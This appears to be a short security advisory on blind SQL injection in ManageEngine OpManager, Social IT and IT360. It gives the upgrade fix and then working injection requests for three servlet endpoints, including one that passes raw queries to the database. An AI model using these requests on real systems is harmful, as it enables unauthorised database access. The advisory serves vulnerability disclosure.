Vulnerability: Blind SQL injection (unauthenticated)
Fix: Upgrade to Social IT vXXXX; OpManager vXXXX; IT360 vXXXX
Constraints: no authentication needed for OpManager and Social IT; authenticated in IT360
a)
POST /servlet/com.manageengine.opmanager.servlet.UpdateProbeUpgradeStatus?upgradeStatus=success&probeName=[SQLi]
POST /servlet/com.manageengine.opmanager.servlet.UpdateProbeUpgradeStatus?upgradeStatus=success&probeName=aaa'%3bcreate+table+bacas+(agga+text)%3b--+b)POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]
POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+c)c)POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi] --> runs direct query in db!
POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)